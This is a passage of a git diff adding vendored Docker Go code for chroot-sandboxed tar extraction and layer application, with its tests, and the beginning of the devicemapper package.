"docker-TestChrootTarUntar") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(src, "toto"), []byte("hello toto"), 0644); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(src, "lolo"), []byte("hello lolo"), 0644); err != nil { + t.Fatal(err) + } + stream, err := archive.Tar(src, archive.Uncompressed) + if err != nil { + t.Fatal(err) + } + dest := 
filepath.Join(tmpdir, "src") + if err := system.MkdirAll(dest, 0700); err != nil { + t.Fatal(err) + } + if err := Untar(stream, dest, &archive.TarOptions{ExcludePatterns: []string{"lolo"}}); err != nil { + t.Fatal(err) + } +} + +// gh#10426: Verify the fix for having a huge excludes list (like on `docker load` with large # of +// local images) +func TestChrootUntarWithHugeExcludesList(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarHugeExcludes") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(src, "toto"), []byte("hello toto"), 0644); err != nil { + t.Fatal(err) + } + stream, err := archive.Tar(src, archive.Uncompressed) + if err != nil { + t.Fatal(err) + } + dest := filepath.Join(tmpdir, "dest") + if err := system.MkdirAll(dest, 0700); err != nil { + t.Fatal(err) + } + options := &archive.TarOptions{} + //65534 entries of 64-byte strings ~= 4MB of environment space which should overflow + //on most systems when passed via environment or command line arguments + excludes := make([]string, 65534, 65534) + for i := 0; i < 65534; i++ { + excludes[i] = strings.Repeat(string(i), 64) + } + options.ExcludePatterns = excludes + if err := Untar(stream, dest, options); err != nil { + t.Fatal(err) + } +} + +func TestChrootUntarEmptyArchive(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarEmptyArchive") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + if err := Untar(nil, tmpdir, nil); err == nil { + t.Fatal("expected error on empty archive") + } +} + +func prepareSourceDirectory(numberOfFiles int, targetPath string, makeSymLinks bool) (int, error) { + fileData := []byte("fooo") + for n := 0; n < numberOfFiles; n++ { + fileName := fmt.Sprintf("file-%d", n) + if err := ioutil.WriteFile(filepath.Join(targetPath, fileName), fileData, 0700); 
err != nil { + return 0, err + } + if makeSymLinks { + if err := os.Symlink(filepath.Join(targetPath, fileName), filepath.Join(targetPath, fileName+"-link")); err != nil { + return 0, err + } + } + } + totalSize := numberOfFiles * len(fileData) + return totalSize, nil +} + +func getHash(filename string) (uint32, error) { + stream, err := ioutil.ReadFile(filename) + if err != nil { + return 0, err + } + hash := crc32.NewIEEE() + hash.Write(stream) + return hash.Sum32(), nil +} + +func compareDirectories(src string, dest string) error { + changes, err := archive.ChangesDirs(dest, src) + if err != nil { + return err + } + if len(changes) > 0 { + return fmt.Errorf("Unexpected differences after untar: %v", changes) + } + return nil +} + +func compareFiles(src string, dest string) error { + srcHash, err := getHash(src) + if err != nil { + return err + } + destHash, err := getHash(dest) + if err != nil { + return err + } + if srcHash != destHash { + return fmt.Errorf("%s is different from %s", src, dest) + } + return nil +} + +func TestChrootTarUntarWithSymlink(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + tmpdir, err := ioutil.TempDir("", "docker-TestChrootTarUntarWithSymlink") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if _, err := prepareSourceDirectory(10, src, false); err != nil { + t.Fatal(err) + } + dest := filepath.Join(tmpdir, "dest") + if err := TarUntar(src, dest); err != nil { + t.Fatal(err) + } + if err := compareDirectories(src, dest); err != nil { + t.Fatal(err) + } +} + +func TestChrootCopyWithTar(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { + t.Skip("Failing on Windows and Solaris") + } + tmpdir, err := ioutil.TempDir("", "docker-TestChrootCopyWithTar") 
+ if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if _, err := prepareSourceDirectory(10, src, true); err != nil { + t.Fatal(err) + } + + // Copy directory + dest := filepath.Join(tmpdir, "dest") + if err := CopyWithTar(src, dest); err != nil { + t.Fatal(err) + } + if err := compareDirectories(src, dest); err != nil { + t.Fatal(err) + } + + // Copy file + srcfile := filepath.Join(src, "file-1") + dest = filepath.Join(tmpdir, "destFile") + destfile := filepath.Join(dest, "file-1") + if err := CopyWithTar(srcfile, destfile); err != nil { + t.Fatal(err) + } + if err := compareFiles(srcfile, destfile); err != nil { + t.Fatal(err) + } + + // Copy symbolic link + srcLinkfile := filepath.Join(src, "file-1-link") + dest = filepath.Join(tmpdir, "destSymlink") + destLinkfile := filepath.Join(dest, "file-1-link") + if err := CopyWithTar(srcLinkfile, destLinkfile); err != nil { + t.Fatal(err) + } + if err := compareFiles(srcLinkfile, destLinkfile); err != nil { + t.Fatal(err) + } +} + +func TestChrootCopyFileWithTar(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "docker-TestChrootCopyFileWithTar") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if _, err := prepareSourceDirectory(10, src, true); err != nil { + t.Fatal(err) + } + + // Copy directory + dest := filepath.Join(tmpdir, "dest") + if err := CopyFileWithTar(src, dest); err == nil { + t.Fatal("Expected error on copying directory") + } + + // Copy file + srcfile := filepath.Join(src, "file-1") + dest = filepath.Join(tmpdir, "destFile") + destfile := filepath.Join(dest, "file-1") + if err := CopyFileWithTar(srcfile, destfile); err != nil { + t.Fatal(err) + } + if err := compareFiles(srcfile, destfile); err != nil { + t.Fatal(err) + } + + // Copy symbolic link + 
srcLinkfile := filepath.Join(src, "file-1-link") + dest = filepath.Join(tmpdir, "destSymlink") + destLinkfile := filepath.Join(dest, "file-1-link") + if err := CopyFileWithTar(srcLinkfile, destLinkfile); err != nil { + t.Fatal(err) + } + if err := compareFiles(srcLinkfile, destLinkfile); err != nil { + t.Fatal(err) + } +} + +func TestChrootUntarPath(t *testing.T) { + // TODO Windows: Figure out why this is failing + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarPath") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if _, err := prepareSourceDirectory(10, src, false); err != nil { + t.Fatal(err) + } + dest := filepath.Join(tmpdir, "dest") + // Untar a directory + if err := UntarPath(src, dest); err == nil { + t.Fatal("Expected error on untaring a directory") + } + + // Untar a tar file + stream, err := archive.Tar(src, archive.Uncompressed) + if err != nil { + t.Fatal(err) + } + buf := new(bytes.Buffer) + buf.ReadFrom(stream) + tarfile := filepath.Join(tmpdir, "src.tar") + if err := ioutil.WriteFile(tarfile, buf.Bytes(), 0644); err != nil { + t.Fatal(err) + } + if err := UntarPath(tarfile, dest); err != nil { + t.Fatal(err) + } + if err := compareDirectories(src, dest); err != nil { + t.Fatal(err) + } +} + +type slowEmptyTarReader struct { + size int + offset int + chunkSize int +} + +// Read is a slow reader of an empty tar (like the output of "tar c --files-from /dev/null") +func (s *slowEmptyTarReader) Read(p []byte) (int, error) { + time.Sleep(100 * time.Millisecond) + count := s.chunkSize + if len(p) < s.chunkSize { + count = len(p) + } + for i := 0; i < count; i++ { + p[i] = 0 + } + s.offset += count + if s.offset > s.size { + return count, io.EOF + } + return count, nil +} + +func TestChrootUntarEmptyArchiveFromSlowReader(t *testing.T) { + tmpdir, err := 
ioutil.TempDir("", "docker-TestChrootUntarEmptyArchiveFromSlowReader") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + dest := filepath.Join(tmpdir, "dest") + if err := system.MkdirAll(dest, 0700); err != nil { + t.Fatal(err) + } + stream := &slowEmptyTarReader{size: 10240, chunkSize: 1024} + if err := Untar(stream, dest, nil); err != nil { + t.Fatal(err) + } +} + +func TestChrootApplyEmptyArchiveFromSlowReader(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "docker-TestChrootApplyEmptyArchiveFromSlowReader") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + dest := filepath.Join(tmpdir, "dest") + if err := system.MkdirAll(dest, 0700); err != nil { + t.Fatal(err) + } + stream := &slowEmptyTarReader{size: 10240, chunkSize: 1024} + if _, err := ApplyLayer(dest, stream); err != nil { + t.Fatal(err) + } +} + +func TestChrootApplyDotDotFile(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "docker-TestChrootApplyDotDotFile") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + src := filepath.Join(tmpdir, "src") + if err := system.MkdirAll(src, 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(src, "..gitme"), []byte(""), 0644); err != nil { + t.Fatal(err) + } + stream, err := archive.Tar(src, archive.Uncompressed) + if err != nil { + t.Fatal(err) + } + dest := filepath.Join(tmpdir, "dest") + if err := system.MkdirAll(dest, 0700); err != nil { + t.Fatal(err) + } + if _, err := ApplyLayer(dest, stream); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go new file mode 100644 index 0000000000..f2325abd74 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go @@ -0,0 +1,86 @@ +// +build !windows + +package chrootarchive + +import ( + "bytes" + "encoding/json" + "flag" + "fmt" + "io" + "io/ioutil" + "os" + "runtime" + + 
"github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" +) + +// untar is the entry-point for docker-untar on re-exec. This is not used on +// Windows as it does not support chroot, hence no point sandboxing through +// chroot and rexec. +func untar() { + runtime.LockOSThread() + flag.Parse() + + var options *archive.TarOptions + + //read the options from the pipe "ExtraFiles" + if err := json.NewDecoder(os.NewFile(3, "options")).Decode(&options); err != nil { + fatal(err) + } + + if err := chroot(flag.Arg(0)); err != nil { + fatal(err) + } + + if err := archive.Unpack(os.Stdin, "/", options); err != nil { + fatal(err) + } + // fully consume stdin in case it is zero padded + if _, err := flush(os.Stdin); err != nil { + fatal(err) + } + + os.Exit(0) +} + +func invokeUnpack(decompressedArchive io.Reader, dest string, options *archive.TarOptions) error { + + // We can't pass a potentially large exclude list directly via cmd line + // because we easily overrun the kernel's max argument/environment size + // when the full image list is passed (e.g. when this is used by + // `docker load`). 
We will marshall the options via a pipe to the + // child + r, w, err := os.Pipe() + if err != nil { + return fmt.Errorf("Untar pipe failure: %v", err) + } + + cmd := reexec.Command("docker-untar", dest) + cmd.Stdin = decompressedArchive + + cmd.ExtraFiles = append(cmd.ExtraFiles, r) + output := bytes.NewBuffer(nil) + cmd.Stdout = output + cmd.Stderr = output + + if err := cmd.Start(); err != nil { + return fmt.Errorf("Untar error on re-exec cmd: %v", err) + } + //write the options to the pipe for the untar exec to read + if err := json.NewEncoder(w).Encode(options); err != nil { + return fmt.Errorf("Untar json encode to pipe failed: %v", err) + } + w.Close() + + if err := cmd.Wait(); err != nil { + // when `xz -d -c -q | docker-untar ...` failed on docker-untar side, + // we need to exhaust `xz`'s output, otherwise the `xz` side will be + // pending on write pipe forever + io.Copy(ioutil.Discard, decompressedArchive) + + return fmt.Errorf("Error processing tar file(%v): %s", err, output) + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go new file mode 100644 index 0000000000..0a500ed5c2 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go @@ -0,0 +1,22 @@ +package chrootarchive + +import ( + "io" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/longpath" +) + +// chroot is not supported by Windows +func chroot(path string) error { + return nil +} + +func invokeUnpack(decompressedArchive io.ReadCloser, + dest string, + options *archive.TarOptions) error { + // Windows is different to Linux here because Windows does not support + // chroot. Hence there is no point sandboxing a chrooted process to + // do the unpack. We call inline instead within the daemon process. 
+ return archive.Unpack(decompressedArchive, longpath.AddPrefix(dest), options) +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go new file mode 100644 index 0000000000..f9d7fed633 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go @@ -0,0 +1,108 @@ +package chrootarchive + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "syscall" + + "github.com/docker/docker/pkg/mount" + rsystem "github.com/opencontainers/runc/libcontainer/system" +) + +// chroot on linux uses pivot_root instead of chroot +// pivot_root takes a new root and an old root. +// Old root must be a sub-dir of new root, it is where the current rootfs will reside after the call to pivot_root. +// New root is where the new rootfs is set to. +// Old root is removed after the call to pivot_root so it is no longer available under the new root. +// This is similar to how libcontainer sets up a container's rootfs +func chroot(path string) (err error) { + // if the engine is running in a user namespace we need to use actual chroot + if rsystem.RunningInUserNS() { + return realChroot(path) + } + if err := syscall.Unshare(syscall.CLONE_NEWNS); err != nil { + return fmt.Errorf("Error creating mount namespace before pivot: %v", err) + } + + // make everything in new ns private + if err := mount.MakeRPrivate("/"); err != nil { + return err + } + + if mounted, _ := mount.Mounted(path); !mounted { + if err := mount.Mount(path, path, "bind", "rbind,rw"); err != nil { + return realChroot(path) + } + } + + // setup oldRoot for pivot_root + pivotDir, err := ioutil.TempDir(path, ".pivot_root") + if err != nil { + return fmt.Errorf("Error setting up pivot dir: %v", err) + } + + var mounted bool + defer func() { + if mounted { + // make sure pivotDir is not mounted before we try to remove it + if errCleanup := syscall.Unmount(pivotDir, syscall.MNT_DETACH); errCleanup != nil { + if 
err == nil { + err = errCleanup + } + return + } + } + + errCleanup := os.Remove(pivotDir) + // pivotDir doesn't exist if pivot_root failed and chroot+chdir was successful + // because we already cleaned it up on failed pivot_root + if errCleanup != nil && !os.IsNotExist(errCleanup) { + errCleanup = fmt.Errorf("Error cleaning up after pivot: %v", errCleanup) + if err == nil { + err = errCleanup + } + } + }() + + if err := syscall.PivotRoot(path, pivotDir); err != nil { + // If pivot fails, fall back to the normal chroot after cleaning up temp dir + if err := os.Remove(pivotDir); err != nil { + return fmt.Errorf("Error cleaning up after failed pivot: %v", err) + } + return realChroot(path) + } + mounted = true + + // This is the new path for where the old root (prior to the pivot) has been moved to + // This dir contains the rootfs of the caller, which we need to remove so it is not visible during extraction + pivotDir = filepath.Join("/", filepath.Base(pivotDir)) + + if err := syscall.Chdir("/"); err != nil { + return fmt.Errorf("Error changing to new root: %v", err) + } + + // Make the pivotDir (where the old root lives) private so it can be unmounted without propagating to the host + if err := syscall.Mount("", pivotDir, "", syscall.MS_PRIVATE|syscall.MS_REC, ""); err != nil { + return fmt.Errorf("Error making old root private after pivot: %v", err) + } + + // Now unmount the old root so it's no longer visible from the new root + if err := syscall.Unmount(pivotDir, syscall.MNT_DETACH); err != nil { + return fmt.Errorf("Error while unmounting old root after pivot: %v", err) + } + mounted = false + + return nil +} + +func realChroot(path string) error { + if err := syscall.Chroot(path); err != nil { + return fmt.Errorf("Error after fallback to chroot: %v", err) + } + if err := syscall.Chdir("/"); err != nil { + return fmt.Errorf("Error changing to new root after chroot: %v", err) + } + return nil +} diff --git 
a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go new file mode 100644 index 0000000000..16354bf648 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go @@ -0,0 +1,12 @@ +// +build !windows,!linux + +package chrootarchive + +import "syscall" + +func chroot(path string) error { + if err := syscall.Chroot(path); err != nil { + return err + } + return syscall.Chdir("/") +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go new file mode 100644 index 0000000000..49acad79ff --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go @@ -0,0 +1,23 @@ +package chrootarchive + +import ( + "io" + + "github.com/docker/docker/pkg/archive" +) + +// ApplyLayer parses a diff in the standard layer format from `layer`, +// and applies it to the directory `dest`. The stream `layer` can only be +// uncompressed. +// Returns the size in bytes of the contents of the layer. +func ApplyLayer(dest string, layer io.Reader) (size int64, err error) { + return applyLayerHandler(dest, layer, &archive.TarOptions{}, true) +} + +// ApplyUncompressedLayer parses a diff in the standard layer format from +// `layer`, and applies it to the directory `dest`. The stream `layer` +// can only be uncompressed. +// Returns the size in bytes of the contents of the layer. 
+func ApplyUncompressedLayer(dest string, layer io.Reader, options *archive.TarOptions) (int64, error) { + return applyLayerHandler(dest, layer, options, false) +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go new file mode 100644 index 0000000000..eb0aacc3ab --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go @@ -0,0 +1,130 @@ +//+build !windows + +package chrootarchive + +import ( + "bytes" + "encoding/json" + "flag" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "runtime" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" + "github.com/docker/docker/pkg/system" + rsystem "github.com/opencontainers/runc/libcontainer/system" +) + +type applyLayerResponse struct { + LayerSize int64 `json:"layerSize"` +} + +// applyLayer is the entry-point for docker-applylayer on re-exec. This is not +// used on Windows as it does not support chroot, hence no point sandboxing +// through chroot and rexec. 
+func applyLayer() { + + var ( + tmpDir = "" + err error + options *archive.TarOptions + ) + runtime.LockOSThread() + flag.Parse() + + inUserns := rsystem.RunningInUserNS() + if err := chroot(flag.Arg(0)); err != nil { + fatal(err) + } + + // We need to be able to set any perms + oldmask, err := system.Umask(0) + defer system.Umask(oldmask) + if err != nil { + fatal(err) + } + + if err := json.Unmarshal([]byte(os.Getenv("OPT")), &options); err != nil { + fatal(err) + } + + if inUserns { + options.InUserNS = true + } + + if tmpDir, err = ioutil.TempDir("/", "temp-docker-extract"); err != nil { + fatal(err) + } + + os.Setenv("TMPDIR", tmpDir) + size, err := archive.UnpackLayer("/", os.Stdin, options) + os.RemoveAll(tmpDir) + if err != nil { + fatal(err) + } + + encoder := json.NewEncoder(os.Stdout) + if err := encoder.Encode(applyLayerResponse{size}); err != nil { + fatal(fmt.Errorf("unable to encode layerSize JSON: %s", err)) + } + + if _, err := flush(os.Stdin); err != nil { + fatal(err) + } + + os.Exit(0) +} + +// applyLayerHandler parses a diff in the standard layer format from `layer`, and +// applies it to the directory `dest`. Returns the size in bytes of the +// contents of the layer. 
+func applyLayerHandler(dest string, layer io.Reader, options *archive.TarOptions, decompress bool) (size int64, err error) { + dest = filepath.Clean(dest) + if decompress { + decompressed, err := archive.DecompressStream(layer) + if err != nil { + return 0, err + } + defer decompressed.Close() + + layer = decompressed + } + if options == nil { + options = &archive.TarOptions{} + if rsystem.RunningInUserNS() { + options.InUserNS = true + } + } + if options.ExcludePatterns == nil { + options.ExcludePatterns = []string{} + } + + data, err := json.Marshal(options) + if err != nil { + return 0, fmt.Errorf("ApplyLayer json encode: %v", err) + } + + cmd := reexec.Command("docker-applyLayer", dest) + cmd.Stdin = layer + cmd.Env = append(cmd.Env, fmt.Sprintf("OPT=%s", data)) + + outBuf, errBuf := new(bytes.Buffer), new(bytes.Buffer) + cmd.Stdout, cmd.Stderr = outBuf, errBuf + + if err = cmd.Run(); err != nil { + return 0, fmt.Errorf("ApplyLayer %s stdout: %s stderr: %s", err, outBuf, errBuf) + } + + // Stdout should be a valid JSON struct representing an applyLayerResponse. + response := applyLayerResponse{} + decoder := json.NewDecoder(outBuf) + if err = decoder.Decode(&response); err != nil { + return 0, fmt.Errorf("unable to decode ApplyLayer JSON response: %s", err) + } + + return response.LayerSize, nil +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go new file mode 100644 index 0000000000..9dd9988de0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go @@ -0,0 +1,45 @@ +package chrootarchive + +import ( + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/longpath" +) + +// applyLayerHandler parses a diff in the standard layer format from `layer`, and +// applies it to the directory `dest`. Returns the size in bytes of the +// contents of the layer. 
+func applyLayerHandler(dest string, layer io.Reader, options *archive.TarOptions, decompress bool) (size int64, err error) { + dest = filepath.Clean(dest) + + // Ensure it is a Windows-style volume path + dest = longpath.AddPrefix(dest) + + if decompress { + decompressed, err := archive.DecompressStream(layer) + if err != nil { + return 0, err + } + defer decompressed.Close() + + layer = decompressed + } + + tmpDir, err := ioutil.TempDir(os.Getenv("temp"), "temp-docker-extract") + if err != nil { + return 0, fmt.Errorf("ApplyLayer failed to create temp-docker-extract under %s. %s", dest, err) + } + + s, err := archive.UnpackLayer(dest, layer, nil) + os.RemoveAll(tmpDir) + if err != nil { + return 0, fmt.Errorf("ApplyLayer %s failed UnpackLayer to %s", err, dest) + } + + return s, nil +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go new file mode 100644 index 0000000000..4f637f17b8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go @@ -0,0 +1,28 @@ +// +build !windows + +package chrootarchive + +import ( + "fmt" + "io" + "io/ioutil" + "os" + + "github.com/docker/docker/pkg/reexec" +) + +func init() { + reexec.Register("docker-applyLayer", applyLayer) + reexec.Register("docker-untar", untar) +} + +func fatal(err error) { + fmt.Fprint(os.Stderr, err) + os.Exit(1) +} + +// flush consumes all the bytes from the reader discarding +// any errors +func flush(r io.Reader) (bytes int64, err error) { + return io.Copy(ioutil.Discard, r) +} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go new file mode 100644 index 0000000000..fa17c9bf83 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go @@ -0,0 +1,4 @@ +package chrootarchive + +func init() { +} diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go 
b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go new file mode 100644 index 0000000000..94b55306f1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper.go @@ -0,0 +1,828 @@ +// +build linux + +package devicemapper + +import ( + "errors" + "fmt" + "os" + "runtime" + "syscall" + "unsafe" + + "github.com/Sirupsen/logrus" +) + +// DevmapperLogger defines methods for logging with devicemapper. +type DevmapperLogger interface { + DMLog(level int, file string, line int, dmError int, message string) +} + +const ( + deviceCreate TaskType = iota + deviceReload + deviceRemove + deviceRemoveAll + deviceSuspend + deviceResume + deviceInfo + deviceDeps + deviceRename + deviceVersion + deviceStatus + deviceTable + deviceWaitevent + deviceList + deviceClear + deviceMknodes + deviceListVersions + deviceTargetMsg + deviceSetGeometry +) + +const ( + addNodeOnResume AddNodeType = iota + addNodeOnCreate +) + +// List of errors returned when using devicemapper. +var ( + ErrTaskRun = errors.New("dm_task_run failed") + ErrTaskSetName = errors.New("dm_task_set_name failed") + ErrTaskSetMessage = errors.New("dm_task_set_message failed") + ErrTaskSetAddNode = errors.New("dm_task_set_add_node failed") + ErrTaskSetRo = errors.New("dm_task_set_ro failed") + ErrTaskAddTarget = errors.New("dm_task_add_target failed") + ErrTaskSetSector = errors.New("dm_task_set_sector failed") + ErrTaskGetDeps = errors.New("dm_task_get_deps failed") + ErrTaskGetInfo = errors.New("dm_task_get_info failed") + ErrTaskGetDriverVersion = errors.New("dm_task_get_driver_version failed") + ErrTaskDeferredRemove = errors.New("dm_task_deferred_remove failed") + ErrTaskSetCookie = errors.New("dm_task_set_cookie failed") + ErrNilCookie = errors.New("cookie ptr can't be nil") + ErrGetBlockSize = errors.New("Can't get block size") + ErrUdevWait = errors.New("wait on udev cookie failed") + ErrSetDevDir = errors.New("dm_set_dev_dir failed") + ErrGetLibraryVersion = 
errors.New("dm_get_library_version failed") + ErrCreateRemoveTask = errors.New("Can't create task of type deviceRemove") + ErrRunRemoveDevice = errors.New("running RemoveDevice failed") + ErrInvalidAddNode = errors.New("Invalid AddNode type") + ErrBusy = errors.New("Device is Busy") + ErrDeviceIDExists = errors.New("Device Id Exists") + ErrEnxio = errors.New("No such device or address") +) + +var ( + dmSawBusy bool + dmSawExist bool + dmSawEnxio bool // No Such Device or Address +) + +type ( + // Task represents a devicemapper task (like lvcreate, etc.) ; a task is needed for each ioctl + // command to execute. + Task struct { + unmanaged *cdmTask + } + // Deps represents dependents (layer) of a device. + Deps struct { + Count uint32 + Filler uint32 + Device []uint64 + } + // Info represents information about a device. + Info struct { + Exists int + Suspended int + LiveTable int + InactiveTable int + OpenCount int32 + EventNr uint32 + Major uint32 + Minor uint32 + ReadOnly int + TargetCount int32 + DeferredRemove int + } + // TaskType represents a type of task + TaskType int + // AddNodeType represents a type of node to be added + AddNodeType int +) + +// DeviceIDExists returns whether error conveys the information about device Id already +// exist or not. This will be true if device creation or snap creation +// operation fails if device or snap device already exists in pool. +// Current implementation is little crude as it scans the error string +// for exact pattern match. Replacing it with more robust implementation +// is desirable. 
+func DeviceIDExists(err error) bool { + return fmt.Sprint(err) == fmt.Sprint(ErrDeviceIDExists) +} + +func (t *Task) destroy() { + if t != nil { + DmTaskDestroy(t.unmanaged) + runtime.SetFinalizer(t, nil) + } +} + +// TaskCreateNamed is a convenience function for TaskCreate when a name +// will be set on the task as well +func TaskCreateNamed(t TaskType, name string) (*Task, error) { + task := TaskCreate(t) + if task == nil { + return nil, fmt.Errorf("devicemapper: Can't create task of type %d", int(t)) + } + if err := task.setName(name); err != nil { + return nil, fmt.Errorf("devicemapper: Can't set task name %s", name) + } + return task, nil +} + +// TaskCreate initializes a devicemapper task of tasktype +func TaskCreate(tasktype TaskType) *Task { + Ctask := DmTaskCreate(int(tasktype)) + if Ctask == nil { + return nil + } + task := &Task{unmanaged: Ctask} + runtime.SetFinalizer(task, (*Task).destroy) + return task +} + +func (t *Task) run() error { + if res := DmTaskRun(t.unmanaged); res != 1 { + return ErrTaskRun + } + return nil +} + +func (t *Task) setName(name string) error { + if res := DmTaskSetName(t.unmanaged, name); res != 1 { + return ErrTaskSetName + } + return nil +} + +func (t *Task) setMessage(message string) error { + if res := DmTaskSetMessage(t.unmanaged, message); res != 1 { + return ErrTaskSetMessage + } + return nil +} + +func (t *Task) setSector(sector uint64) error { + if res := DmTaskSetSector(t.unmanaged, sector); res != 1 { + return ErrTaskSetSector + } + return nil +} + +func (t *Task) setCookie(cookie *uint, flags uint16) error { + if cookie == nil { + return ErrNilCookie + } + if res := DmTaskSetCookie(t.unmanaged, cookie, flags); res != 1 { + return ErrTaskSetCookie + } + return nil +} + +func (t *Task) setAddNode(addNode AddNodeType) error { + if addNode != addNodeOnResume && addNode != addNodeOnCreate { + return ErrInvalidAddNode + } + if res := DmTaskSetAddNode(t.unmanaged, addNode); res != 1 { + return ErrTaskSetAddNode + } + 
return nil +} + +func (t *Task) setRo() error { + if res := DmTaskSetRo(t.unmanaged); res != 1 { + return ErrTaskSetRo + } + return nil +} + +func (t *Task) addTarget(start, size uint64, ttype, params string) error { + if res := DmTaskAddTarget(t.unmanaged, start, size, + ttype, params); res != 1 { + return ErrTaskAddTarget + } + return nil +} + +func (t *Task) getDeps() (*Deps, error) { + var deps *Deps + if deps = DmTaskGetDeps(t.unmanaged); deps == nil { + return nil, ErrTaskGetDeps + } + return deps, nil +} + +func (t *Task) getInfo() (*Info, error) { + info := &Info{} + if res := DmTaskGetInfo(t.unmanaged, info); res != 1 { + return nil, ErrTaskGetInfo + } + return info, nil +} + +func (t *Task) getInfoWithDeferred() (*Info, error) { + info := &Info{} + if res := DmTaskGetInfoWithDeferred(t.unmanaged, info); res != 1 { + return nil, ErrTaskGetInfo + } + return info, nil +} + +func (t *Task) getDriverVersion() (string, error) { + res := DmTaskGetDriverVersion(t.unmanaged) + if res == "" { + return "", ErrTaskGetDriverVersion + } + return res, nil +} + +func (t *Task) getNextTarget(next unsafe.Pointer) (nextPtr unsafe.Pointer, start uint64, + length uint64, targetType string, params string) { + + return DmGetNextTarget(t.unmanaged, next, &start, &length, + &targetType, ¶ms), + start, length, targetType, params +} + +// UdevWait waits for any processes that are waiting for udev to complete the specified cookie. +func UdevWait(cookie *uint) error { + if res := DmUdevWait(*cookie); res != 1 { + logrus.Debugf("devicemapper: Failed to wait on udev cookie %d", *cookie) + return ErrUdevWait + } + return nil +} + +// LogInitVerbose is an interface to initialize the verbose logger for the device mapper library. +func LogInitVerbose(level int) { + DmLogInitVerbose(level) +} + +var dmLogger DevmapperLogger + +// LogInit initializes the logger for the device mapper library. 
